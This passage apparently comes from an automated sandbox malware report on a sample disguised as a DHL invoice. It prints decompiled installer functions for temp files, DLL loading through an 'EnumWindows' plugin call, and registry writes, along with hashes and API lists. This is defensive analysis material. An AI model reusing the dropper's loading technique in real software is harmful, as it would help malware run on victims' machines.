					_t15 = GetTempFileNameW(_a8,  &_v12, 0, _t24); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t21 != 0) {
						continue;
					} else {
						 *_t24 = _t15;
					}
					L5:
					return _t15;
				}
				_t15 = _t24;
				goto L5;
			}

0x00406a5c
0x00406a62
0x00406a63
0x00406a63
0x00406a64
0x00406a6b
0x00406a72
0x00406a7a
0x00406a80
0x00406a8d
0x00406a95
0x00000000
0x00000000
0x00406a99
0x00000000
0x00406a9b
0x00406a9b
0x00406a9b
0x00406aa2
0x00406aa5
0x00406aa5
0x00406aa0
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406A72
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CD4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406A8D

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A5F
C:\Users\user\AppData\Local\Temp\, xrefs: 00406A5B
a, xrefs: 00406A6B
n, xrefs: 00406A64

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-3027303449
Opcode ID: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
Instruction ID: ceede72bcc8b9f9399702d6205d38d242a1142e8e26f45c6d668c419d088e7be
Opcode Fuzzy Hash: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
Instruction Fuzzy Hash: E9F05E72700208BBEB149F55DC09BDE7779EF91B14F14803BEA41BA180E3F45E5487A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040225D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0040225D(void* __ebp, void* _a4, void* _a8, intOrPtr _a12, intOrPtr* _a16, WCHAR* _a20, void* _a28, intOrPtr _a32, signed int _a48) {
				void* _v0;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t26;
				void* _t27;
				intOrPtr* _t29;
				void* _t30;
				WCHAR* _t32;
				struct HINSTANCE__* _t33;
				void* _t37;
				void* _t39;

				_t37 = __ebp;
				_t27 = 1;
				if( *0x435a60 < __ebp) {
					_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
					_push(0xffffffe7);
					L16:
					E00405D3A();
					L17:
					 *0x435ac8 =  *0x435ac8 + _t27;
					return 0;
				}
				_t32 = E0040303E(_t30, 0xfffffff0);
				_a20 = _t32;
				_a12 = E0040303E(_t30, 1);
				if(_a48 == __ebp) {
					L4:
					_t17 = LoadLibraryExW(_t32, _t37, 8); // executed
					_t33 = _t17;
					_t44 = _t33;
					if(_t33 == 0) {
						_push("C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
						_push(0xfffffff6);
						goto L16;
					}
					L5:
					_t29 = E00406269(_t44, _t33, _a20);
					_a16 = _t29;
					if(_t29 == 0) {
						E00405D3A(0xfffffff7, _a20);
					} else {
						_t27 = _t37;
						if(_a48 == _t27) {
							 *_t29(_a32, 0x400, L"user32::EnumWindows(i r1 ,i 0)", 0x40b100, 0x40b000);
							_t39 = _t39 + 0x14;
						} else {
							E00405D3A(_a48, "C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
							if(_a16() != 0) {
								_t27 = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 + 0x34)) == _t37 && E00403CD6(_t33) != 0) {
						FreeLibrary(_t33);
					}
					goto L17;
				}
				_t26 = GetModuleHandleW(_t32); // executed
				_t33 = _t26;
				if(_t33 != 0) {
					goto L5;
				}
				_t32 =  *(_t39 + 0x18);
				goto L4;
			}

0x0040225d
0x00402260
0x00402268
0x0040233e
0x00402343
0x00402345
0x00402345
0x00402ea5
0x00402ea5
0x00402eb7
0x00402eb7
0x00402275
0x00402278
0x00402281
0x00402289
0x0040229c
0x004022a0
0x004022a6
0x004022a8
0x004022aa
0x00402335
0x0040233a
0x00000000
0x0040233a
0x004022b0
0x004022ba
0x004022bc
0x004022c2
0x0040230c
0x004022c4
0x004022c4
0x004022ca
0x004022ff
0x00402301
0x004022cc
0x004022d5
0x004022e0
0x004022e2
0x004022e2
0x004022e0
0x004022ca
0x00402315
0x0040232a
0x0040232a
0x00000000
0x00402315
0x0040228c
0x00402292
0x00402296
0x00000000
0x00000000
0x00402298
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C

Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?), ref: 00405D99
Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll), ref: 00405DB1
Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004022A0
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 004022F4
C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll, xrefs: 004022CC, 00402335, 0040233E

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll$user32::EnumWindows(i r1 ,i 0)
API String ID: 334405425-2764200230
Opcode ID: 5d9898d65b13684158c7c887a5d08f6c9bc0d99037dba9cc0df1bb948ee2ac44
Instruction ID: aa6b704e5079027a8c34e107c1f377ebbd1d9565507d54c53cf3a7cdcd1ba86e
Opcode Fuzzy Hash: 5d9898d65b13684158c7c887a5d08f6c9bc0d99037dba9cc0df1bb948ee2ac44
Instruction Fuzzy Hash: C3210632648701ABD710AF618E8DA3F76A4ABD8721F20013FF941B12D1DBBC9801979F

Uniqueness

Uniqueness Score: -1.00%

Function 00402656 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402656(int _a20, intOrPtr _a24, intOrPtr _a40, intOrPtr _a52, intOrPtr _a56, char _a60, intOrPtr _a72) {
				void* _v0;
				void* _v4;
				void* _v8;
				void* _t20;
				intOrPtr _t24;
				signed int _t25;
				signed int _t32;
				void* _t37;
				intOrPtr _t39;
				int _t45;
				void* _t46;
				int _t47;
				void* _t49;
				void* _t51;

				_a24 = _a56;
				_a20 = _a60;
				_a24 = E0040303E(_t37, 2);
				_t20 = E0040303E(_t37, 0x11);
				_t32 = 1;
				E004062A5(_t51, E00403023(_a72), _t20, 0x100022,  &_a60); // executed
				_t39 =  !=  ? 0 : _a40;
				_a52 = _t39;
				if(_t39 != 0) {
					_t24 = _a24;
					if(_t24 != 1) {
						_t45 = 4;
						__eflags = _t24 - 1;
						if(_t24 != 1) {
							_t45 = _t47;
							__eflags = _t24 - 3;
							if(_t24 == 3) {
								_t45 = E00403148(_a52, _t47, 0x40c108, 0x1800);
							}
						} else {
							 *0x40c108 = E00403002(3);
						}
					} else {
						E0040303E(_t37, 0x23);
						_t45 = 2 + lstrlenW(0x40c108) * 2;
					}
					_t46 =  *(_t49 + 0x54);
					_t25 = RegSetValueExW(_t46,  *(_t49 + 0x2c), _t47, _a20, 0x40c108, _t45); // executed
					asm("sbb eax, eax");
					_t32 = _t32 &  ~_t25;
					RegCloseKey(_t46); // executed
				}
				 *0x435ac8 =  *0x435ac8 + _t32;
				return 0;
			}

0x0040265a
0x00402664
0x0040266f
0x00402673
0x0040268a
0x00402692
0x0040269f
0x004026a2
0x004026a8
0x004026ae
0x004026b9
0x004026d3
0x004026d4
0x004026d6
0x004026e7
0x004026e9
0x004026ec
0x004026fe
0x004026fe
0x004026d8
0x004026e0
0x004026e0
0x004026bb
0x004026bd
0x004026c8
0x004026c8
0x00402701
0x00402710
0x00402718
0x0040271a
0x0040271d
0x0040271d
0x00402ea5
0x00402eb7

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp,00000023,?,00000011,00000002), ref: 004026C3
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp,?,?,00000011,00000002), ref: 00402710
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp,?,?,00000011,00000002), ref: 0040271D

Strings

C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp, xrefs: 004026B2, 004026C2, 004026E0, 004026F3, 00402705

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp
API String ID: 2655323295-2439044459
Opcode ID: 3e07514d90428e6a88bb3508a2036233d11feb277dc401e629d577e54deb66e6
Instruction ID: b85799c5b09c0d4e5107b9a6a50aeda658419008c73e2f9c6ba38a7de01b1a8e
Opcode Fuzzy Hash: 3e07514d90428e6a88bb3508a2036233d11feb277dc401e629d577e54deb66e6
Instruction Fuzzy Hash: CF21D072608311ABD711AFA5CC85B2FBBE8EB98760F10093EF541F71C1C7B99901879A

Uniqueness

Uniqueness Score: -1.00%

Function 004068E6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004068E6(signed int _a4) {
				struct HINSTANCE__* _t6;
				signed int _t8;

				_t8 = _a4;
				_t9 =  *(0x40b030 + _t8 * 8);
				_t6 = GetModuleHandleA( *(0x40b030 + _t8 * 8));
				if(_t6 != 0) {
					L2:
					return GetProcAddress(_t6,  *(0x40b034 + _t8 * 8));
				}
				_t6 = E0040619E(_t9); // executed
				if(_t6 != 0) {
					goto L2;
				}
				return _t6;
			}

0x004068e8
0x004068ec
0x004068f4
0x004068fc
0x00406908
0x00000000
0x00406910
0x004068ff
0x00406906
0x00000000
0x00000000
0x00406918

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
GetProcAddress.KERNEL32(00000000), ref: 00406910

Part of subcall function 0040619E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
Part of subcall function 0040619E: wsprintfW.USER32 ref: 004061F1
Part of subcall function 0040619E: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406205

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068E7
UXTHEME, xrefs: 004068E6, 004068F3, 004068FE

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
Instruction ID: 085141bfa328d30a19c357711f10e0b2ef6edf17adcd8b925e9f05de384a5053
Opcode Fuzzy Hash: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
Instruction Fuzzy Hash: 00D02B316012159BDB001F22AE0C94F771DEEA67907020032F501F6231E334DC21C5FC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E3E Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E3E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				short _t17;
				int _t21;
				long _t23;

				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_t17 = 4;
				_v36.Control = _t17;
				_v36.Owner = 0x409760;
				_v36.Group = 0x409760;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Dacl = 0x409750;
				_v16.nLength = 0xc;
				_t21 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t21 != 0) {
					L3:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) == 0) {
						return GetLastError();
					}
					goto L3;
				}
				return _t23;
			}

0x00405e44
0x00405e48
0x00405e4e
0x00405e4f
0x00405e58
0x00405e5b
0x00405e61
0x00405e6b
0x00405e71
0x00405e78
0x00405e7f
0x00405e87
0x00405eac
0x00000000
0x00405eac
0x00405e89
0x00405e94
0x00405eaa
0x00000000
0x00405eb0
0x00000000
0x00405eaa
0x00405eb7

APIs

CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E7F
GetLastError.KERNEL32 ref: 00405E89
SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405EA2
GetLastError.KERNEL32 ref: 00405EB0

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
Instruction ID: 6ae0cafa5f15e980fc825a914f3c6ead540d2f1400f747b3271702dfe1e84024
Opcode Fuzzy Hash: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
Instruction Fuzzy Hash: 3F01D675D00209EBEB009FA0D948BEFBBB9EB14315F104526E949F2291E7789A44CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00405E1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E1E(WCHAR* _a4) {
				int _t2;
				long _t5;

				_t5 = 0;
				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					_t5 = GetLastError();
				}
				return _t5;
			}

0x00405e1f
0x00405e26
0x00405e2e
0x00405e36
0x00405e36
0x00405e3b

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00405E26
GetLastError.KERNEL32 ref: 00405E30

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1E

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1375471231-3355392842
Opcode ID: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
Instruction ID: 407710f282aa9913273e94a45afee278ff037c1c447fef60eab8b448319c413c
Opcode Fuzzy Hash: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
Instruction Fuzzy Hash: 56C012326050309BC3201B69AD0CA87BE94EB906A13018635B989E2220D2308C008AE8

Uniqueness

Uniqueness Score: -1.00%

Function 6EF2167A Relevance: 4.6, APIs: 3, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6EF2167A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x6ef25040 =  *((intOrPtr*)(_t87 + 8));
				 *0x6ef2503c =  *((intOrPtr*)(_t87 + 0x94));
				 *0x6ef25038 =  *((intOrPtr*)(_t87 + 0x90));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x9c)) + 0xc))( *0x6ef25014, E6EF2132B, _t84);
				_push("true");
				_t37 = E6EF22351();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E6EF21FCB(_t85);
					}
					E6EF22049(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E6EF22209(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_t64 = 8;
								_t14 = _t85 + 0x1018; // 0x1018
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E6EF21F1E(_t85, _t87 + 0x30);
								 *(_t85 + 0x1034) =  *(_t85 + 0x1034) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x1020)) = _t43;
								 *_t56 = 4;
								E6EF22209(_t85);
								_t66 = 8;
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E6EF22209(_t85);
							_t37 = GlobalFree(E6EF215EB(E6EF21668(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E6EF2200D(_t85);
							_t62 =  *(_t85 + 0x1010);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x1008);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x1010);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E6EF215C5( *0x6ef2502c);
							}
						}
						if(( *(_t85 + 0x1010) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85); // executed
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E6EF22F9F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E6EF22D14(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E6EF217F7();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6ef2167a
0x6ef2167a
0x6ef2167a
0x6ef21684
0x6ef21690
0x6ef2169d
0x6ef216b4
0x6ef216b7
0x6ef216b9
0x6ef216be
0x6ef216c3
0x6ef217ef
0x6ef217f6
0x6ef216c9
0x6ef216cd
0x6ef216d0
0x6ef216d5
0x6ef216d7
0x6ef216e1
0x6ef21719
0x6ef21720
0x6ef21744
0x6ef21792
0x6ef21746
0x6ef21746
0x6ef21747
0x6ef21748
0x6ef2174b
0x6ef21750
0x6ef21750
0x6ef2175d
0x6ef21760
0x6ef21765
0x6ef2176d
0x6ef21773
0x6ef21779
0x6ef21789
0x6ef2178a
0x6ef2178e
0x6ef21722
0x6ef21723
0x6ef21738
0x6ef21738
0x6ef2179c
0x6ef2179f
0x6ef217a5
0x6ef217ab
0x6ef217b0
0x6ef217b8
0x6ef217c0
0x6ef217c3
0x6ef217c9
0x6ef217c9
0x6ef217c0
0x6ef217d1
0x6ef217d9
0x6ef217de
0x6ef217d1
0x6ef217e6
0x6ef217e9
0x6ef217e9
0x00000000
0x6ef217e6
0x6ef216e6
0x6ef216e9
0x6ef2170e
0x00000000
0x00000000
0x6ef21711
0x6ef21716
0x6ef21716
0x6ef21718
0x00000000
0x6ef21718
0x6ef216eb
0x6ef216ee
0x6ef216fa
0x6ef216fb
0x00000000
0x6ef216fb
0x6ef216f0
0x6ef216f3
0x6ef21702
0x6ef21703
0x00000000
0x6ef21703
0x6ef216f8
0x00000000
0x00000000
0x00000000
0x6ef216f8

APIs

Part of subcall function 6EF22351: GlobalFree.KERNEL32(?), ref: 6EF22A44
Part of subcall function 6EF22351: GlobalFree.KERNEL32(?), ref: 6EF22A4A
Part of subcall function 6EF22351: GlobalFree.KERNEL32(?), ref: 6EF22A50

GlobalFree.KERNEL32(00000000), ref: 6EF21738
FreeLibrary.KERNEL32(?), ref: 6EF217C3
GlobalFree.KERNELBASE(00000000), ref: 6EF217E9

Part of subcall function 6EF21FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6EF21FFA

Part of subcall function 6EF217F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6EF21708,00000000), ref: 6EF2189A

Part of subcall function 6EF21F1E: wsprintfW.USER32 ref: 6EF21F51

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

